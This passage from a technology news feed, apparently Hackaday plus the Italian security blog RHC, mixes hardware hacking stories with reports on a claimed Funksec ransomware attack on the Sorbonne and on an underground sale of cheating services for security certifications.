So the decision was made to remove the physical write protection screws from each computer, which would allow for the installation of a standard Linux distribution. Once running stock Debian, it took some custom scripts to get each machine to boot up into Chromium and point at the appropriate web page. From there, socket.io is used to synchronize the playback of the carefully prepared video file.
On the other side of the project, [Aksel] shows the logistics of taking the machines apart and getting them ready for their new jig. Initial experiments focused on mounting the hardware to a laser-cut piece of acrylic, which looked good, but simply wasn’t robust enough. In the end, the solution was a highly customized 3D printed mount which holds the motherboard securely while also providing a place to attach each LCD.
End-of-life Chromebooks can be had for pennies on the dollar, and they’ll only become more common with time, so we’re eager to see what folks end up doing with them. Between the hardware and software aspects of this particular hack, we’re sure there’s a trick or two you’ll pick up from this one.
youtube.com/embed/6HSC_Q2xEgI?…
Taming the Wobble: An Arduino Self-Balancing Bot
Getting a robot to stand on two wheels without tipping over involves a challenging dance with the laws of physics. Self-balancing robots are a great way to get into control systems, sensor fusion, and embedded programming. This build by [mircemk] shows how to make one with just a few common components, an Arduino, and a bit of patience fine-tuning the PID controller.
At the heart of the bot is the MPU6050 – a combo accelerometer/gyroscope sensor that keeps track of tilt and movement. An Arduino Uno takes this data, runs it through a PID loop, and commands an L298N motor driver to adjust the speed and direction of two DC motors. The power comes from two Li-ion batteries feeding everything with enough juice to keep it upright. The rest of the magic lies in the tuning.
PID (Proportional-Integral-Derivative) control is what makes the robot stay balanced. Kp (proportional gain) determines how aggressively the motors respond to tilting. Kd (derivative gain) dampens oscillations, and Ki (integral gain) helps correct slow drifts. Set them wrong, and your bot either wobbles like a confused penguin or falls flat on its face. A good trick is to start with only Kp, then slowly add Kd and Ki until it stabilizes. Then don’t forget to calibrate your MPU6050; each sensor has unique offsets that need to be compensated in the code.
Once dialed in, the result is a robot that looks like it defies gravity. Whether you’re hacking it for fun, turning it into a segway-like ride, or using it as a learning tool, a balancing bot is a great way to sharpen your control system skills. For more inspiration, check out this earlier attempt from 2022, or these self-balancing robots (one with a little work) from a year before that. You can read up on [mircemk]’s project details here.
Sorbonne Université nel mirino di Funksec: il gruppo ransomware rivendica un attacco
Il gruppo ransomware Funksec rivendica un attacco alla Sorbonne Université di Parigi, riportando di aver sottratto 20 GB di dati sensibili. Secondo le informazioni pubblicate sul loro Data Leak Site (DLS), i cybercriminali dichiarano di essere in possesso di documenti riservati, credenziali e piani strategici dell’ateneo.
Al momento, non è possibile confermare la veridicità di queste affermazioni, poiché l’organizzazione non ha ancora pubblicato alcun comunicato ufficiale in merito all’incidente. Tuttavia, Funksec avrebbe fissato un ultimatum di 12 giorni, minacciando di rendere pubblici i dati il 19 marzo 2025, qualora non venisse soddisfatta una richiesta – presumibilmente un riscatto in criptovaluta.
Analisi del post pubblicato nel Data Leak Site di Funksec
Il post pubblicato sul DLS di Funksec mostra chiaramente il logo della Sorbonne Université, accompagnato da un messaggio di rivendicazione.
Dall’analisi della schermata emergono alcuni dettagli rilevanti:
- Il conto alla rovescia: posizionato in alto a destra, indica il tempo rimanente prima della presunta pubblicazione dei dati. Questo è un classico strumento di pressione utilizzato dai gruppi ransomware per spingere la vittima a negoziare prima della scadenza.
- La descrizione dell’attacco: Funksec affermerebbe di possedere informazioni confidenziali, comprese credenziali e documenti strategici. Tuttavia, non vi sono prove concrete a supporto di questa dichiarazione.
- La tecnica di intimidazione: il testo presente nel DLS suggerirebbe alle vittime di cercare il proprio nome nei dati compromessi, una tattica psicologica utilizzata per amplificare l’ansia e aumentare la pressione su studenti, docenti e personale.
- L’identità del gruppo: il marchio “© 2025 Funksec ransomware” mostra l’intento del gruppo di consolidare la propria reputazione nel panorama del cybercrime. La loro strategia sembrerebbe mirata a costruire un’identità riconoscibile, simile a quella di gruppi più noti come LockBit o BlackCat.
Chi è Funksec? Un gruppo ransomware emergente
Funksec è un gruppo ransomware emerso pubblicamente alla fine del 2024, guadagnando rapidamente notorietà grazie ad attacchi mirati contro istituzioni governative e accademiche. I suoi membri si dichiarano autodidatti e sembrerebbero collaborare con altri gruppi di cybercriminali per affinare tecniche e strumenti offensivi. Molti attori dietro FunkSec sembrano inesperti, e parte delle informazioni pubblicate potrebbero essere riciclate da precedenti fughe di dati legate ad attività hacktiviste, sollevando dubbi sulla loro autenticità.
Un aspetto chiave dell’attività di FunkSec è la sua forte presenza su Breached Forum, una delle principali piattaforme di discussione del cybercrimine. Il gruppo ha sfruttato il forum per promuovere le proprie operazioni, condividere fughe di dati e guadagnare notorietà.
Uno dei membri più attivi su Breached Forum è Scorpion, noto anche come DesertStorm, che ha promosso FunkSec tramite un video su YouTube nell’ottobre 2024, sebbene il contenuto fosse più propagandistico che una reale dimostrazione delle capacità del gruppo. DesertStorm ha continuato a pubblicare presunte fughe di dati su Breached Forum fino a quando il suo account non è stato bannato nel novembre 2024. Dopo la sua esclusione, un altro attore, El Farado, ha assunto un ruolo chiave nella promozione del gruppo, condividendo fughe di dati e mantenendo alta la visibilità di FunkSec sul forum.
Le discussioni su Breached Forum indicano che FunkSec utilizza una combinazione di tattiche di hacktivismo e cybercrimine. Alcuni membri del gruppo sembrano avere trascorsi in ambienti hacktivisti, mentre altri sono più orientati al guadagno economico. Il loro ransomware, scritto in Rust e con sviluppo in continua evoluzione, è stato promosso direttamente su Breached Forum con aggiornamenti frequenti sulle nuove funzionalità. Inoltre, FunkSec ha pubblicato richieste di collaborazione e servizi aggiuntivi, tra cui un presunto sistema di “data sorting” gestito da un membro noto come XTN.
Alcune fughe di FunkSec sono state pubblicate su DarkForums da un utente con il nome Bjorka, un noto hacktivista indonesiano. Tuttavia, non ci sono prove definitive che il vero Bjorka sia coinvolto con FunkSec, e potrebbe trattarsi di un tentativo di sfruttare la sua notorietà.
L’analisi del loro ransomware suggerisce che il codice sia stato sviluppato con l’assistenza dell’intelligenza artificiale, consentendo al gruppo di iterare rapidamente le versioni nonostante la scarsa esperienza tecnica dei suoi membri. Questo solleva interrogativi sulla reale minaccia rappresentata da FunkSec e sulla difficoltà di distinguere tra hacktivismo e cybercrimine nell’ecosistema ransomware attuale.
Il gruppo opererebbe secondo il modello della doppia estorsione: non solo cifrerebbe i dati delle vittime, ma ne esfiltrerebbe una copia per minacciarne la pubblicazione in caso di mancato pagamento del riscatto. Questo approccio rende la strategia difensiva più complessa, poiché il semplice ripristino dei sistemi dai backup non sarebbe sufficiente per mitigare il danno reputazionale e legale derivante dalla diffusione delle informazioni rubate.
FunkSec sostiene di integrare l’intelligenza artificiale nel 30% dei propri processi operativi, sebbene non vi siano prove indipendenti a supporto di questa affermazione. Secondo quanto dichiarato, l’IA verrebbe utilizzata per:
- Automatizzare attacchi di phishing altamente mirati
- Creare strumenti personalizzati per lo sfruttamento delle vulnerabilità
- Analizzare e prioritizzare le potenziali vittime con maggiore efficienza
L’IA nel cybercrime: una nuova frontiera per il ransomware?
L’utilizzo dell’intelligenza artificiale nel cybercrime non è una novità assoluta, ma la crescente sofisticazione di questi strumenti sta alimentando una nuova ondata di minacce. Se le affermazioni di Funksec fossero confermate, saremmo di fronte a un gruppo che sfrutta strumenti avanzati per automatizzare operazioni complesse, riducendo la necessità di competenze manuali e aumentando l’efficacia degli attacchi.
Le applicazioni dell’IA nel cybercrime potrebbero includere:
- La generazione di campagne di phishing più realistiche
- L’identificazione di vulnerabilità con tecniche predittive
- Lo sviluppo di malware capaci di eludere i sistemi di sicurezza tradizionali
Nonostante ciò, la maggior parte dei ransomware oggi in circolazione continua a basarsi su tecniche consolidate, come lo sfruttamento di credenziali compromesse o l’abuso di vulnerabilità non patchate. L’intelligenza artificiale potrebbe accelerare questi processi, ma al momento non ha ancora rivoluzionato il panorama delle minacce.
Conclusioni
Al momento, la presunta violazione rivendicata dal gruppo Funksec Ransomware rimane non confermata da fonti istituzionali. Tuttavia, la potenziale gravità della questione — vista la natura strategica dei dati che sarebbero stati sottratti — richiede un’attenta valutazione dei rischi e delle contromisure da parte delle autorità competenti.
RHC continuerà a monitorare la situazione e pubblicherà eventuali ulteriori aggiornamenti qualora emergessero informazioni significative. Invitiamo chiunque sia a conoscenza di dettagli rilevanti a contattarci attraverso la mail crittografata del whistleblower, garantendo la possibilità di rimanere anonimi.
L'articolo Sorbonne Université nel mirino di Funksec: il gruppo ransomware rivendica un attacco proviene da il blog della sicurezza informatica.
Fixing an Unpleasant SD Card Slot Issue In a NanoVNA
SD cards & the much smaller microSD cards are found on many devices, with the card often accessible from outside the enclosure. Unfortunately there’s a solid chance that especially small microSD cards will find their way past the microSD card reader slot and into the enclosure. This is what happened to [Rob] of the SevenFortyOne Radios and Repairs channel on YouTube with a NanoVNA unit. While shaking the unit, you can clearly hear the microSD card rattling inside, courtesy of the rather large gap above the card slot.
After a quick teardown and extracting the lost microSD card, the solution to prevent this is a simple bit of foam stuck on top of the microSD card slot, so that the too large opening in the enclosure is now fully blocked. It’s clearly a bit of a design fail in this particular NanoVNA unit, worsened by the tiny size of the card and having to use a fingernail to push the card into the slot as it’s so far inside the enclosure.
While [Rob] seems to blame himself for this event, we’d chalk it mostly up to poor design. It’s an issue that’s seen with certain SBC enclosures and various gadgets too, where losing a microSD card is pretty much a matter of time, and hugely fiddly at the best of times. That said, what is your preferred way of handling microSD card insertion & removal in devices like these?
youtube.com/embed/4-mij2XYdUQ?…
The Coolest Batteries You’ve Never Heard Of
Imagine cooling your building with the same principle that kept Victorian-era icehouses stocked with lake-frozen blocks, but in modern form. That’s the idea behind ice batteries, a clever energy storage hack that’s been quietly slashing cooling costs across commercial buildings. The invention works by freezing water when energy is cheap, and using that stored cold later, they turn major power hogs (air conditioning, we’re looking at you) into more efficient, cost-effective systems.
Pioneers like Nostromo Energy and Ice Energy are refining the tech. Nostromo’s IceBrick modules pack 25 kWh of cooling capacity each, install on rooftops, and cost around $250 per kWh—about half the price of lithium-ion storage. Ice Energy’s Ice Bear 40 integrates with HVAC systems, shifting up to 95% of peak cooling demand to off-peak hours. And for homes, the Ice Bear 20 replaces traditional AC units while doubling as a thermal battery.
Unlike lithium-ion, ice batteries don’t degrade chemically – their water is endlessly reusable. Combining the technology with this hack, it’s even possible in environments where water is scarce. But the trade-off? They only store cooling energy. No frozen kilowatts for your lightbulbs, just an efficient way to handle the biggest energy drain in most buildings.
Could ice batteries help decentralize energy storage? They’re already proving their worth in high-demand areas like California and Texas. Read the full report here and let us know your thoughts in the comments.
Original photo by Kelly Sikkema on Unsplash
Game Over: Cloudflare e il caos sui browser meno diffusi!
Gli utenti di alcuni browser meno diffusi lamentano problemi di accesso a vari siti dovuti al funzionamento dei sistemi Cloudflare. I giornalisti del The Register riferiscono che la loro attenzione su questo problema è stata attirata dagli utenti, dagli specialisti della sicurezza informatica e dagli sviluppatori del browser open source Pale Moon.
Sembra che gli utenti si lamentino regolarmente della mancata disponibilità del sito web relativo al forum di Cloudflare, ma l’azienda non sembra prestarvi attenzione. Ad esempio, i ricercatori hanno trovato segnalazioni di problemi relativi a Cloudflare e al blocco di siti web risalenti al 2015 , al 2022 , a marzo e luglio 2024 e a gennaio 2025.
I problemi sorgono perché Cloudflare mira a combattere le botnet e gli attacchi DDoS rilevando e bloccando qualsiasi attività sospetta. Ad esempio, dispositivi infetti che fanno parte di botnet ed eseguono determinati script. Un modo per rilevarli è controllare l’agente del browser e, se non proviene da un browser noto, bloccarlo.
Purtroppo l’elenco dei browser accettabili è limitato e include solo le ultime versioni di browser noti come Chrome (e i suoi numerosi derivati) e Firefox. Di norma, gli utenti delle ultime versioni dei browser Pale Moon, Falkon e SeaMonkey riscontrano problemi di blocco.
Le ultime note di rilascio di Pale Moon indicano che gli sviluppatori stanno cercando di risolvere questo problema, che spesso provoca il blocco del browser, la mancata risposta alle richieste o l’arresto anomalo del sistema. Anche alcuni utenti di Firefox 115 ESR (l’ultima versione per macOS 10.13 e Windows 7) riscontrano problemi di blocco. Tra i siti frequentemente interessati dal problema ci sono science.org, steamdb.info, convertapi.com e persino community.cloudflare.com.
Allo stesso tempo, secondo alcuni partecipanti alla discussione del problema su Hacker News, Cloudflare potrebbe considerare un’attività sospetta non solo l’utilizzo di browser o sistemi operativi di nicchia, ma anche una richiesta di un URL senza specificare un ID di riferimento. Mentre un utente prudente può bloccare il tracciamento, per il provider CDN tale attività è un segnale che le azioni non sono eseguite da un essere umano.
I giornalisti sottolineano che il supporto tecnico di Cloudflare è principalmente incentrato sui clienti aziendali e che gli utenti comuni possono solo lamentarsi di ciò che accade sui forum della community. Tuttavia, a giudicare dal numero di messaggi riguardanti il blocco, l’azienda non monitora i forum per segnalazioni di problemi.
L'articolo Game Over: Cloudflare e il caos sui browser meno diffusi! proviene da il blog della sicurezza informatica.
Retrotechtacular: Better Living Through Nuclear Chemistry
The late 1950s were such an optimistic time in America. World War II had been over for less than a decade, the economy boomed thanks to pent-up demand after years of privation, and everyone was having babies — so many babies. The sky was the limit, especially with new technologies that promised a future filled with miracles, including abundant nuclear power that would be “too cheap to meter.”
It didn’t quite turn out that way, of course, but the whole “Atoms for Peace” thing did provide the foundation for a lot of innovations that we still benefit from to this day. This 1958 film on “The Armour Research Reactor” details the construction and operation of the world’s first privately owned research reactor. Built at the Illinois Institute of Technology by Atomics International, the reactor was a 50,000-watt aqueous-homogenous design using a solution of uranyl sulfate in distilled water as its fuel. The core is tiny, about a foot in diameter, and assembled by hand right in front of the camera. The stainless steel sphere is filled with 90 feet (27 meters) of stainless tubing to circulate cooling water through the core. Machined graphite reflector blocks surrounded the core and its fuel overflow tank (!) before the reactor was installed in “biological shielding” made from super-dense iron ore concrete with walls 5 feet (1.5 m) thick — just a few of the many advanced safety precautions taken “to ensure completely safe operation in densely populated areas.”
While the reactor design is interesting enough, the control panels and instrumentation are what really caught our eye. The Fallout vibe is strong, including the fact that the controls are all right in the room with the reactor. This allows technicians equipped with their Cutie Pie meters to insert samples into irradiation tubes, some of which penetrate directly into the heart of the core, where neutron flux is highest. Experiments included the creation of radioactive organic compounds for polymer research, radiation hardening of those new-fangled transistors, and manufacturing radionuclides for the diagnosis and treatment of diseases.
This mid-century technological gem might look a little sketchy to modern eyes, but the Armour Research Reactor had a long career. It was in operation until 1967 and decommissioned in 1972, and similar reactors were installed in universities and private facilities all over the world. Most of them are gone now, though, with only five aqueous-homogenous reactors left operating today.
youtube.com/embed/2Y3JsQ3evcM?…
Fictional Computers: EMERAC was the Chatbot of 1957
Movies mirror the time they were made. [ErnieTech] asserts that we can see what people thought about computers back in 1957 by watching the classic Spencer Tracy/Katharine Hepburn movie “Desk Set.” What’s more, he thinks this might be the first movie appearance of a human-like computer. On a side note, in the UK this movie was known as “The Other Woman.”
The story is about an MIT computer expert computerizing a broadcasting company who, of course, finds romance and, at least towards the end, comedy.
Of course, we are interested in the computer. It was supposedly an IBM machine and while IBM apparently provided some equipment (probably typewriters and tape drives), the computer is clearly just a ton of light bulbs. It was named Emmie, which was a nickname for EMERAC. Oddly enough, it was about like a modern web search engine or chatbot, answering random research questions. The difference is they had fed all the world’s knowledge into it themselves using punched cards.
The video has spoilers, but for a movie made in 1957, that’s not really an issue. The ending is pretty predictable, anyway. Like many people in 1957, there was a fear that “computers were going to take all our jobs!” [Ernie] makes the point that this was a common trope where the computer would run the Enterprise company and then made a big mistake, and everyone realized we still needed humans. EMERAC later guest-starred in the movie “The Fly.” It was just a background player in the chorus, though.
He also points out that many of the things people thought about the widespread adoption of computers are still true today if you replace computer with AI. Turns out, you still need to know how to reset the system.
[Ernie] did a video about Colossus last month, a topic we also visited last year. One of our favorite fictional computers, though, was more recent from “The Three Body Problem.”
youtube.com/embed/ckrUWOnlwkA?…
Writing an OLED Display Driver in MicroZig
Although most people would use C, C++ or MicroPython for programming microcontrollers, there are a few more obscure options out there as well, with MicroZig being one of them. Recently [Andrew Conlin] wrote about how to use MicroZig with the Raspberry Pi RP2040 MCU, showing the process of writing an SSD1306 OLED display driver and running it. Although MicroZig has since published a built-in version, the blog post gives a good impression of what developing with MicroZig is like.
Zig is a programming language which seeks to improve on the C language, adding memory safety, safe pointers (via option types), while keeping as much as possible of what makes C so useful for low-level development intact. The MicroZig project customizes Zig for use in embedded projects, targeting platforms including the Raspberry Pi MCUs and STM32. During [Andrew]’s usage of MicroZig it was less the language or supplied tooling that tripped him up, and more just the convoluted initialization of the SSD1306 controller, which is probably a good sign. The resulting project code can be found on his GitHub page.
Expensive Camera, Cheap 3D-Printed Lens
If you’re a photography enthusiast, you probably own quite a few cameras, but the chances are your “good” one will have interchangeable lenses. Once you’ve exhausted the possibilities of the kit lens, you can try different focal lengths and effects, but you’ll soon find out that good glass isn’t cheap. Can you solve this problem by making your own lenses? [Billt] has done just that.
Given some CAD skills, it’s possible to replicate the mount on an existing lens, but he takes a shortcut by using a readily available camera cap project. There are two lenses detailed in the video below the break; the first is a plastic lens from a disposable camera, while the second takes one from a Holga toy camera. The plastic lens is inserted mid-print, giving the colour aberrations and soft focus you’d expect, while the Holga lens is mounted on a slide for focusing. There may be some room for improvement there, but the result is a pair of fun lenses for experimentation for not much outlay. Given the number of broken older cameras out there, it should be relatively easy for anyone wanting to try this for themselves to have a go.
The video is below the break, but while you’re on this path, take a look at a previous project using disposable camera lenses. Or, consider printing an entire camera.
youtube.com/embed/S5-6ZxoWP7Q?…
Transceiver Reveals Unusual Components
[MSylvain59] likes to tear down old surplus, and in the video below, he takes apart a German transceiver known as a U-600M. From the outside, it looks like an unremarkable gray box, especially since it is supposed to work with a remote unit, so there’s very little on the outside other than connectors. Inside, though, there’s plenty to see and even a few surprises.
Inside is a neatly built RF circuit with obviously shielded compartments. In addition to a configurable power supply, the radio has modules that allow configuration to different frequencies. One of the odder components is a large metal cylinder marked MF450-1900. This appears to be a mechanical filter. There are also a number of unusual parts like dogbone capacitors and tons of trimmer capacitors.
The plug-in modules are especially dense and interesting. In particular, some of the boards are different from some of the others. It is an interesting design from a time predating broadband digital synthesis techniques.
While this transceiver is stuffed with parts, it probably performs quite well. However, transceivers can be simple. Even more so if you throw in an SDR chip.
youtube.com/embed/tw9qxqWB9SM?…
Physical Computing Used to be a Thing
In the early 2000s, the idea that you could write programs on microcontrollers that did things in the physical world, like run motors or light up LEDs, was kind of new. At the time, most people thought of coding as stuff that stayed on the screen, or in cyberspace. This idea of writing code for physical gadgets was uncommon enough that it had a buzzword of its own: “physical computing”.
You never hear much about “physical computing” these days, but that’s not because the concept went away. Rather, it’s probably because it’s almost become the norm. I realized this as Tom Nardi and I were talking on the podcast about a number of apparently different trends that all point in the same direction.
We started off talking about the early days of the Arduino revolution. Sure, folks have been building hobby projects with microcontrollers built in before Arduino, but the combination of a standardized board, a wide-ranging software library, and abundant examples to learn from brought embedded programming to a much wider audience. And particularly, it brought this to an audience of beginners who were not only blinking an LED for the first time, but maybe even taking their first steps into coding. For many, the Arduino hello world was their coding hello world as well. These folks are “physical computing” natives.
Now, it’s to the point that when Arya goes to visit FOSDEM, an open-source software convention, there is hardware everywhere. Why? Because many successful software projects support open hardware, and many others run on it. People port their favorite programming languages to microcontroller platforms, and as they become more powerful, the lines between the “big” computers and the “micro” ones starts to blur.
And I think this is awesome. For one, it’s somehow more rewarding, when you’re just starting to learn to code, to see the letters you type cause something in the physical world to happen, even if it’s just blinking an LED. At the same time, everything has a microcontroller in it these days, and hacking on these devices is also another flavor of physical computing – there’s code in everything that you might think of as hardware. And with open licenses, everything being under version control, and more openness in open hardware than we’ve ever seen before, the open-source hardware world reflects the open-source software ethos.
Are we getting past the point where the hardware / software distinction is even worth making? And was “physical computing” just the buzzword for the final stages of blurring out those lines?
This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!
The Pentium Processor’s Innovative (and Complicated) Method of Multiplying by Three, Fast
[Ken Shirriff] has been sharing a really low-level look at Intel’s Pentium (1993) processor. The Pentium’s architecture was highly innovative in many ways, and one of [Ken]’s most recent discoveries is that it contains a complex circuit — containing around 9,000 transistors — whose sole purpose is to multiply specifically by three. Why does such an apparently simple operation require such a complex circuit? And why this particular operation, and not something else?
Let’s back up a little to put this all into context. One of the feathers in the Pentium’s cap was its Floating Point Unit (FPU) which was capable of much faster floating point operations than any of its predecessors. [Ken] dove into reverse-engineering the FPU earlier this year and a close-up look at the Pentium’s silicon die shows that the FPU occupies a significant chunk of it. Of the FPU, nearly half is dedicated to performing multiplications and a comparatively small but quite significant section of that is specifically for multiplying a number by three. [Ken] calls it the x3 circuit.
Why does the multiplier section of the FPU in the Pentium processor have such specialized (and complex) functionality for such an apparently simple operation? It comes down to how the Pentium multiplies numbers.
Multiplying two 64-bit numbers is done in base-8 (octal), which ultimately requires fewer operations than doing so in base-2 (binary). Instead of handling each bit separately (as in binary multiplication), three bits of the multiplier get handled at a time, requiring fewer shifts and additions overall. But the downside is that multiplying by three must be handled as a special case.
[Ken] gives an excellent explanation of exactly how all that works (which is also an explanation of the radix-8 Booth’s algorithm) but it boils down to this: there are numerous shortcuts for multiplying numbers (multiplying by two is the same as shifting left by 1 bit, for example) but multiplying by three is the only one that doesn’t have a tidy shortcut. In addition, because the result of multiplying by three is involved in numerous other shortcuts (x5 is really x8 minus x3 for example) it must also be done very quickly to avoid dragging down those other operations. Straightforward binary multiplication is too slow. Hence the reason for giving it so much dedicated attention.
[Ken] goes into considerable detail on how exactly this is done, and it involves carry lookaheads as a key element to saving time. He also points out that this specific piece of functionality used more transistors than an entire Z80 microprocessor. And if that is not a wild enough idea for you, then how about the fact that the Z80 has a new OS available?
Get Into Meshtastic On the Cheap With This Tiny Node Kit
There’s been a lot of buzz about Meshtastic lately, and with good reason. The low-power LoRa-based network has a ton of interesting use cases, and as with any mesh network, the more nodes there are, the better it works for everyone. That’s why we’re excited by this super-affordable Meshtastic kit that lets you get a node on the air for about ten bucks.
The diminutive kit, which consists of a microcontroller and a LoRa module, has actually been available from the usual outlets for a while. But [concretedog] has been deep in the Meshtastic weeds lately, and decided to review its pros and cons. Setup starts with flashing Meshtastic to the XIAO ESP32-S3 microcontroller and connecting the included BLE antenna. After that, the Wio-SX1262 LoRa module is snapped to the microcontroller board via surface-mount connectors, and a separate LoRa antenna is connected. Flash the firmware (this combo is supported by the official web flasher), and you’re good to go.
What do you do with your new node? That’s largely up to you, of course. Most Meshtastic users seem content to send encrypted text messages back and forth, but as our own [Jonathan Bennett] notes, a Meshtastic network could be extremely useful for emergency preparedness. Build a few of these nodes, slap them in a 3D printed box, distribute them to willing neighbors, and suddenly you’ve got a way to keep connected in an emergency, no license required.
Hacker criminali per Hacker etici: il mercato nero delle certificazioni falsificate
Un utente con il nickname adispystore ha pubblicato un annuncio su un noto forum underground, offrendo presunti servizi remoti e report d’esame per diverse certificazioni di sicurezza informatica, tra cui OSCP, OSEP, OSWE, CRTP e CRTE.
L’inserzione offre i seguenti servizi:
- OSCP: Servizi di supporto remoto durante l’esame con un metodo dichiarato “non rilevabile”.
- HTB CPTS e CBBH: Report d’esame e assistenza remota.
- CRTE e CRTP: Supporto su Discord durante l’esame.
- CRTO: Servizi di esame remoto.
- OSWE Exam Report: Fornitura del codice sorgente, exploit RCE e report dettagliato sugli ambienti Akount e Soapbx.
- OSEP Exam Writeup (14 flag) – Febbraio 2025: Disponibilità di prove a supporto.
L’utente dichiara di trattare esclusivamente su Discord con il nome adispy e avverte di non essere responsabile per eventuali transazioni effettuate con contatti che si spacciano per lui.
Le certificazioni coinvolte
Le certificazioni offerte in questo annuncio sono altamente tecniche e riconosciute nel settore della cybersecurity. Ecco una panoramica:
- OSCP+ (Offensive Security Certified Professional Plus) attesta non solo l’esperienza in sicurezza informatica, ma indica anche che il professionista è aggiornato con gli ultimi standard e pratiche del settore. La designazione “+” sottolinea l’impegno per l’apprendimento continuo. Se non si mantiene il “+” attraverso formazione continua, il titolare conserva comunque l’OSCP, una certificazione pratica e tecnica che richiede di attaccare e penetrare macchine live in un ambiente controllato, utilizzando gli strumenti di Kali Linux.
- HTB CPTS (Hack The Box Certified Penetration Testing Specialist): Certificazione di Hack The Box che valida competenze intermedie nel penetration testing, incluse tecniche avanzate di exploitation, privilege escalation e reportistica.
- HTB CBBH (Hack The Box Certified Bug Bounty Hunter): Certificazione di Hack The Box specializzata nel bug bounty hunting e sicurezza web, con enfasi su vulnerabilità complesse in applicazioni e API.’esame testa la capacità di individuare e sfruttare vulnerabilità complesse in applicazioni web e API.
- OSEP (OffSec Experienced Penetration Tester): Certificazione avanzata di Offensive Security che attesta competenze elevate nel penetration testing contro ambienti protetti. Copre tecniche di evasione di sicurezza, bypass di antivirus ed EDR, attacchi avanzati a reti Windows e Active Directory. L’ottenimento della OSEP distingue i professionisti esperti nella simulazione di attacchi sofisticati, rendendoli altamente ricercati nella cybersecurity offensiva.
- OSWE (Offensive Security Web Expert): Certificazione di OffSec focalizzata sulla sicurezza avanzata delle applicazioni web. Valida le competenze nel test di penetrazione web, nell’elusione delle difese e nella creazione di exploit personalizzati per vulnerabilità critiche. I professionisti certificati OSWE sono altamente qualificati nella protezione delle organizzazioni dalle minacce web.
- CRTP (Certified Red Team Professional): Certificazione focalizzata su tecniche di Red Teaming per principianti, che copre attacchi su infrastrutture Windows Active Directory, come privilege escalation e lateral movement, emulando le tattiche di attori APT.
- CRTE (Certified Red Team Expert): Certificazione avanzata per professionisti esperti nel Red Teaming. Si concentra su simulazioni di attacchi complessi e avanzati contro infrastrutture aziendali, emulando le TTP (Tactics, Techniques, and Procedures) di attori APT, con enfasi su attacchi sofisticati e la gestione di ambienti complessi.
- CRTO (Certified Red Team Operator): Certificazione che insegna strategie avanzate di Red Teaming. Focalizzata sulla simulazione di minacce persistenti avanzate (APTs), l’operatore acquisisce competenze nella valutazione delle difese organizzative e nell’utilizzo di strumenti e metodologie per esercizi di Red Teaming efficaci. Inoltre, enfatizza la collaborazione con i Blue Team per migliorare la postura di sicurezza complessiva.
Metodi di cheating avanzati
L’annuncio menziona l’utilizzo di metodi “non rilevabili” per il supporto remoto agli esami. Questo potrebbe indicare l’impiego di tecniche sofisticate come:
- Remote Access Trojan (RAT): Malware per controllare a distanza il sistema dell’esaminando senza essere rilevato.
- Virtual Machine Escaping: Uso di ambienti virtuali per eludere i controlli di sicurezza.
- Obfuscation e Anti-Detection: Tecniche per nascondere attività sospette e sfuggire ai sistemi di monitoraggio.
- e altro ancora
Questo caso rappresenta un tentativo di frode accademica su larga scala. L’acquisto di report d’esame o l’uso di assistenza remota durante i test non solo viola le regole delle certificazioni, ma comporta anche rischi come:
- Compromissione dell’integrità professionale: Chi ottiene una certificazione in modo fraudolento potrebbe non avere le competenze richieste, creando problemi nel settore della sicurezza informatica.
- Rischi legali: Essere scoperti nell’uso di questi servizi può portare alla revoca della certificazione e conseguenze legali.
- Esposizione a truffe: Molti venditori su forum underground potrebbero essere truffatori, rubando denaro senza fornire alcun servizio.
Conclusioni e monitoraggio
Attualmente, non possiamo confermare l’autenticità della notizia. Le informazioni riportate provengono da fonti pubbliche accessibili su forum underground e vanno interpretate come una fonte di intelligence, non come una conferma definitiva.
RHC monitorerà l’evoluzione della vicenda per fornire eventuali aggiornamenti sul blog. Chiunque abbia informazioni aggiuntive può contattarci in forma anonima tramite la nostra mail crittografata per whistleblower.
L'articolo Hacker criminali per Hacker etici: il mercato nero delle certificazioni falsificate proviene da il blog della sicurezza informatica.
The Road to Lucid Dreaming Might be Paved With VR
Lucid dreaming is the state of becoming aware one is dreaming while still being within the dream. To what end? That awareness may allow one to influence the dream itself, and the possibilities of that are obvious and compelling enough that plenty of clever and curious people have formed some sort of interest in this direction. Now there are some indications that VR might be a useful tool in helping people achieve lucid dreaming.
The research paper (Virtual reality training of lucid dreaming) is far from laying out a conclusive roadmap, but there’s enough there to make the case that VR is at least worth a look as a serious tool in the quest for lucid dreaming.
One method of using VR in this way hinges on the idea that engaging in immersive VR content can create mild dissociative experiences, and this can help guide and encourage users to perform “reality checks”. VR can help such reality checks become second nature (or at least more familiar and natural), which may help one to become aware of a dream state when it occurs.
Another method uses VR as a way to induce a mental state that is more conducive to lucid dreaming. As mentioned, engaging in immersive VR can induce mild dissociative experiences, so VR slowly guides one into a more receptive state before falling asleep. Since sleeping in VR is absolutely a thing, perhaps an enterprising hacker with a healthy curiosity in lucid dreaming might be inspired to experiment with combining them.
We’ve covered plenty of lucid dreaming hacks over the years and there’s even been serious effort at enabling communication from within a dreaming state. If you ask us, that’s something just begging to be combined with VR.
This Laser Knows about Gasses
What’s that smell? If you can’t tell, maybe a new laser system from CU Bolder and NIST can help. The device is simple and sensitive enough to detect gasses at concentrations down to parts per trillion.
The laser at the system’s heart is a frequency comb laser, originally made for optical atomic clocks. The laser has multiple optical frequencies in its output. The gas molecules absorb light of different wavelengths differently, giving each type of molecule a unique fingerprint.
Unlike traditional lasers, which emit a single frequency, a frequency comb laser can emit thousands or millions of colors at once. The inventor picked up the Nobel prize in 2005 for that work.
The gas is placed between two highly-reflective mirrors. The beam bounces in this optical cavity, although previous attempts were difficult because the cavity has a particular affinity for frequencies. The answer was to jiggle the mirrors to change the size of the cavity during measurments.
This is one of those things that doesn’t seem very complicated except — whoops — you need an exotic comb laser. But if those ever become widely available, you could probably figure out how to replicate this.
This could revolutionize air quality instruments. Small quantities of hydrogen sulfide can be detected easily (although, paradoxically, too much is hard to smell).
Tearing Down a Vintage Word Processor
There was a time when the line between typewriters and word processing software was a bit fuzzy. [Poking Technology] found a Xerox 6040 which can’t decide what it is. It looks like a typewriter but has a monitor and a floppy drive, along with some extra buttons. You can watch him tear it down in the video below.
The old device uses a daisywheel type element, which, back then, was state of the art. A wheel had many spokes with letters and the printer would spin the wheel and then strike the plastic spoke.
